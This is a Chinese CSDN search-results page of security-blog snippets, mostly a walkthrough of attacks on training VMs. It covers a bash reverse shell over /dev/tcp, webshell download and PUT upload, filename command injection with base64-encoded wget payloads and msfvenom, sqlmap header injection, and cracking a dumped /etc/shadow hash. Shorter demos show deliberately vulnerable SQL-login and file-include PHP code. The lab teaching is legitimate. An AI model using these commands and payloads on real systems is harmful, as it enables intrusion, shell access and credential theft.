精华内容
下载资源
问答
  • Web安全漏洞的靶场演示

    万次阅读 多人点赞 2020-08-15 00:54:20
    命令执行漏洞 一般查看home目录,挖掘用户信息:ls -alh /home ...查看系统信息:uname -a 利用ssh命令执行root权限命令 ... 比如查看bill用户sudo命令的权限:ssh bill@localhost sudo -l ubuntu自带防火墙,所以关闭...

    命令执行漏洞

    一般查看home目录,挖掘用户信息:ls -alh /home
    查看具体用户的目录:ls -alh /home/用户名/
    查看系统信息:uname -a
    m0re

    利用ssh命令执行root权限命令
    使用ssh 用户名@localhost通过ssh登录服务器是不需要身份验证的;
    比如查看bill用户sudo命令的权限:ssh bill@localhost sudo -l
    ubuntu自带防火墙,所以关闭防火墙方便后面的操作。
    ssh bill@localhost sudo ufw disable
    反弹shell
    攻击机启动监听netcat
    nc -nlvp 4444
    查看是否nc正在监听
    netstat -pantu
    m0re

    靶场机器反弹shell

    ssh bill@locahost sudo bash -i >& /dev/tcp/ip/4444 0>&1
    

    然后监听端
    m0re

    渗透测试技巧

    • 开启python简易http服务器
    python -m SimpleHTTPServer
    

    利用命令执行下载木马文件

    ssh bill@localhost sudo wget "http://[ip]:[port]/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
    

    不过没有成功
    m0re

    暴力破解

    使用wpscan对用户名进行提取

    wpscan --url www.vtcsec.com/secret/ --enumerate u
    

    探测到一个用户名为admin
    m0re

    使用metasploit进行暴力破解
    m0re
    破解完成,密码admin
    m0re
    登录成功
    m0re
    制作webshell进行上传。

    访问404界面

    http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
    

    这里再提一下之前的提权,这次这个可以查看shadow文件

    cat /etc/shadow
    root:!:17484:0:99999:7:::
    daemon:*:17379:0:99999:7:::
    bin:*:17379:0:99999:7:::
    sys:*:17379:0:99999:7:::
    sync:*:17379:0:99999:7:::
    games:*:17379:0:99999:7:::
    man:*:17379:0:99999:7:::
    lp:*:17379:0:99999:7:::
    mail:*:17379:0:99999:7:::
    news:*:17379:0:99999:7:::
    uucp:*:17379:0:99999:7:::
    proxy:*:17379:0:99999:7:::
    www-data:*:17379:0:99999:7:::
    backup:*:17379:0:99999:7:::
    list:*:17379:0:99999:7:::
    irc:*:17379:0:99999:7:::
    gnats:*:17379:0:99999:7:::
    nobody:*:17379:0:99999:7:::
    systemd-timesync:*:17379:0:99999:7:::
    systemd-network:*:17379:0:99999:7:::
    systemd-resolve:*:17379:0:99999:7:::
    systemd-bus-proxy:*:17379:0:99999:7:::
    syslog:*:17379:0:99999:7:::
    _apt:*:17379:0:99999:7:::
    messagebus:*:17379:0:99999:7:::
    uuidd:*:17379:0:99999:7:::
    lightdm:*:17379:0:99999:7:::
    whoopsie:*:17379:0:99999:7:::
    avahi-autoipd:*:17379:0:99999:7:::
    avahi:*:17379:0:99999:7:::
    dnsmasq:*:17379:0:99999:7:::
    colord:*:17379:0:99999:7:::
    speech-dispatcher:!:17379:0:99999:7:::
    hplip:*:17379:0:99999:7:::
    kernoops:*:17379:0:99999:7:::
    pulse:*:17379:0:99999:7:::
    rtkit:*:17379:0:99999:7:::
    saned:*:17379:0:99999:7:::
    usbmux:*:17379:0:99999:7:::
    marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
    mysql:!:17486:0:99999:7:::
    sshd:*:17486:0:99999:7:::
    

    所以可以进行尝试之前提到的一种提权方式
    先将两个文件下载下来

    meterpreter > download /etc/shadow
    [*] Downloading: /etc/shadow -> shadow
    [*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow
    [*] download   : /etc/shadow -> shadow
    meterpreter > download /etc/passwd
    [*] Downloading: /etc/passwd -> passwd
    [*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd
    [*] download   : /etc/passwd -> passwd
    

    然后逆向一下这两个文件

    unshadow passwd shadow > cracked
    

    然后会发现有了cracked这个文件,在用John进行破解一下,就得到了一个用户名和密码marlinspike
    m0re
    然后登录到一个相对较高的用户,得到一个较高的权限,这个时候,可以使用sudo -l
    查看可以使用的sudo命令。
    然后发现可以使用sudo bash
    最后得到root权限
    m0re

    命令执行(使用集成工具测试)

    一个工具,是个坑,不知道什么时候改名字了,原本叫sparta,我找半天没找到,就自己安装,总是定位不到依赖包,尝试了各种方法也没有安装成功。就是因为它改名字了,现在叫legion
    m0re

    感谢那个发现改名的大师傅。
    其他没什么了。

    中间件PUT漏洞

    中间件介绍

    中间件包括apache、tomcat、IIS、weblogic等,这些中间件可以设置支持的http方法。(HTTP方法包括GET、POST、HEAD、DELETE、PUT、OPTIONS等)
    每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。
    直接上传shell,也可以从侧面反映PUT漏洞的眼中危害性。

    测试靶场

    使用nikto和dirb等工具扫描,除了扫描出来一个test目录,什么也没有;Owasp zap这个漏洞扫描器也没有结果;所以学习一个新工具curl

    curl -v -X OPTIONS http://10.0.2.8/test
    

    m0re

    利用PUT漏洞获取shell思路:
    上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali linux中获取反弹shell;
    上传webshell;在test目录下直接使用浏览器插件poster,上传webshell
    使用/usr/share/webshells/php/下的webshell
    使用火狐工具插件RESTClient上传,内容粘贴shell的代码。然后nc监听相应端口;
    m0re

    然后发送,再去浏览器访问这个URL就可以执行shell了;
    查看nc监听情况。
    得到shell
    m0re

    命令注入

    找到一个上传页面,而且经过测试只能上传后缀为csv的文件,所以在桌面新建一个1.csv然后使用burpsuite进行抓包修改参数,写入可执行的命令在名称里面。
    启动监听,使用msfconsole

    msfconsole
    use exploit/multi/handler 
    set payload linux/x86/meterpreter_reverse_tcp
    set lhost 10.0.2.4
    exploit		#开启监听
    

    然后制作shell;

    msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=10.0.2.4 lport=4444 -f elf > /var/www/html/shell
    

    然后就是绕过防火墙 上传shell
    利用base64绕过防火墙检测

    service apache2 start		#开启apache服务
    echo 'wget http://10.0.2.4/shell -O /tmp/shell' | base64
    echo 'chmod +x /tmp/shell' | base64
    echo '/tmp/shell' | base64
    

    使用burpsuite抓包修改参数

    "<?php shell system(base64_decode('base64encodestrings'));die();?>.php"
    

    一步一步的将参数修改上传,最后得到反弹的shell,
    提升权限;
    登录服务器后,反弹的shell是www-data用户,并不具备root权限,
    使用sudo -l 查看www-data用户的sudo权限;
    根据提示执行以下命令(为了方便,程序员便设置了不需要密码就可以执行的web操作)

    sudo perl -e "exec '/bin/bash' "
    bash -i
    

    就得到了服务器的root用户权限。

    SQL注入-X-Forwarded-For报头注入

    靶场是linux 2.6x的系统,安装虚拟机时注意。
    然后对靶机进行信息收集,发现了敏感目录,访问是一个登录页面
    尝试弱口令登录,但是失败了。
    m0re

    放弃使用弱口令,开始进行漏洞扫描,使用AVWS进行漏洞扫描。
    m0re
    配置好,然后开始scan
    等待结果就可以了
    m0re

    最后这个有个高危漏洞,是个盲注。详细信息继续查看。
    看出是关于X-Forwarded-For报头注入的一个SQL盲注漏洞。
    m0re

    使用sqlmap进行探测,就可以得到数据库中的数据了。

     sqlmap -u "http://10.0.2.10" --headers="X-Forwarded-For:*" --dbs --batch
     sqlmap -u "http://10.0.2.10" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
     sqlmap -u "http://10.0.2.10" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
     sqlmap -u "http://10.0.2.10" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C "login,password" --dump --batch
    

    按照套路来就行,最后测出数据
    m0re

    账号密码进行登录
    然后就是老套路,上传webshell,连接,提权等操作。

    展开全文
  • WEB安全基础-SQL注入演示

    千次阅读 2018-01-25 21:53:21
    这个是下面演示的源码,看链接地址找对应文件 http://download.csdn.net/download/qq78442761/10224681 本次演示SQL注入 首先进入login.html。源码在上面的链接有 首先正常登录用户名密码都是admin   ...


    这个是下面演示的源码,看链接地址找对应文件

    http://download.csdn.net/download/qq78442761/10224681


    本次演示SQL注入

    首先进入login.html。源码在上面的链接有

    首先正常登录用户名密码都是admin

     

    密码不对时:

     

     

     

     下面演示下SQL注入

     

     

    发送这种情况是因为,先看登录的源码

    logincheck.php

     

    <?php  
    $username = $_POST['username'];  
    $password = MD5($_POST['password']);  
    
    //echo "Name:".$username."<br/>Password:".$password."<br/>";
      
    //包含数据库连接文件  
    require_once("../include/global.php");
    
    //检测用户名及密码是否正确  
    $check_query = mysql_query("select id from teacher where name='$username' and passwd='$password' limit 1"); 
    
    //echo "select id from teacher where name='$username' and passwd='$password' limit 1" ;
    if($result = mysql_fetch_array($check_query)){  
        //登录成功  
        $value = $result['id'];  
    	setcookie("admin",$value, time()+3600*24);
    	echo "<script language=javascript>alert('Success.');window.location='login.html'</script>";		
        exit;  
    } else {  
    		
    	echo "<script language=javascript>alert('Fail.');window.location='login.html'</script>";	
    	die();
    }  
    ?>

    此时发现有字符串的拼接 username 如果是 admin’ -- ‘

    那么就会变成如下命令:

    Select id from teacher where name=’admin’ --’ and passwd=’XXXX’ limit 1’

    所以后面的命令都被注释掉了

     

     

    下面进行第二个演示:

    因为用post方法,所以我们用火狐浏览器打开,并使用hackbar进行修改参数。

    初始化运行如下所示:

     

    我们先输入正确的用户名和密码:都是admin

     

    登录成功后

     

    现在演示用户名或密码错误的情况

     

    此时我们注意他登录失败了,并且注意他的SQL命令

     

     

    下面进行SQL注入未输入密码登录:

     

    (后面的内容都被注释掉了)

     

     

    查询mysql版本信息:

     


    展开全文
  • YII 的安全演示代码SQL

    千次阅读 2014-05-08 10:04:54
    /** * SQL注入演示 */ public function sql_unsafe($id) { $connection = Yii::app()->db; $sql = "SELECT * FROM qi_cell WHERE id = {$id}"; $command = $connection->createCo
     /**
         * SQL注入演示
         */
        public function sql_unsafe($id) {
            $connection = Yii::app()->db;
            $sql = "SELECT * FROM qi_cell WHERE id = {$id}";
            $command = $connection->createCommand($sql);
            
            // $command->bindParam(":id", $id, PDO::PARAM_STR);
            
            $command->execute();
        }
        
        /**
         * 防SQL注入演示
         */
        public function sql_safe() {
            $connection = Yii::app()->db;
            $sql = "SELECT * FROM qi_cell WHERE id = :id";
            $command = $connection->createCommand($sql);
            
            $command->bindParam(":id", $id, PDO::PARAM_STR);
            
            $command->execute();
        }

    展开全文
  • 这个是下面演示的源码,看链接地址找对应文件 http://download.csdn.net/download/qq78442761/10224681 文件下载漏洞   登进网站后运行截图如下: 点击下载后! 可以发现一个...

    这个是下面演示的源码,看链接地址找对应文件

    http://download.csdn.net/download/qq78442761/10224681


    文件下载漏洞

     

    登进网站后运行截图如下:


    点击下载后!



    可以发现一个链接,我们修改这个链接,修改成download.php?name=download.php

     

    整体链接如下:

    http://websecurity.163.com/demo/security/security_2_7/download.php?name=download.php

    我们发现可以直接下载,造成这个原因之一是开发者为对文件后缀名校验(也就是php后缀的不能下)

    这就是文件下载漏洞。

     

     

    下面是文件包含漏洞,首先进入网站



    我们做一个eval.png,但里面内容如下:


    <?php
    	phpinfo();
    ?>

    因为上面的文件下载漏洞,可以下载一个include.php的文件,下面是代码

    <?php
    	if(isset($_GET['name'])){
    		
    		$filename = $_GET['name'];
    
    		include($filename);
    	}else{
    		echo "Error.";
    	}
    ?>


    发现他是用get方法,现在先把文件上传上去:


    复制链接地址,

    此时输入

    http://websecurity.163.com/demo/security/security_2_7/include.php?name=upload/evil.png

    下面是运行截图,这就是文件包含漏洞



    展开全文
  • 网络信息安全(二)——ARP攻击实验演示。 往期检索:程序设计学习笔记——目录 创建时间:2020年10月4日 软件版本: VMware® Workstation 16 Pro (16.0.0) ARP攻击实验演示 :1. ARP攻击实验原理:2. ARP...
  • 一款好用的开源信息安全管理系统演示(视频)  本文出自 “李晨光原创技术博客” 博客,谢绝转载!
  • 一、实验目的 1. 熟悉安胜安全操作系统的运行环境 2. 熟悉隐蔽通道的工作原理 二、实验内容 1.完成发送和接收程序的编写、编译和执行 2.演示存在的隐蔽通道场景:
  • 这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解...
  • 一、实验目的 1. 熟悉安胜安全操作系统的运行环境 2. 熟悉隐蔽通道的工作原理 二、实验内容 1.完成发送和接收程序的编写、编译和执行 2.演示存在的隐蔽通道场景:
  • 信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示&病毒制作&木马捆绑】 一、脚本及恶意网页病毒演示实验 1、创建文件 2、拷贝文件 3、删除文件 4、修改文件 二、病毒详解及批处理病毒制作 关机bat脚本...
  • pragma solidity ^0.4.18; contract Reentrance { mapping(address => uint) public balances; function donate(address _to) public payable { balances[_to] += msg.value;... function balanceOf(address _...
  • ThreadLocal 内存泄漏 代码演示 实例演示

    千次阅读 热门讨论 2020-06-30 19:47:29
    引用 像下面代码,stu是再for外面定义的,线程内每次都使用这个stu对象,那么依旧会有线程安全问题,因为该stu对象还是多线程之间共享这个对象。 所以一定要再每个线程内new对象,避免多线程共享。 也可以自己实现...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 220,453
精华内容 88,181
关键字:

安全演示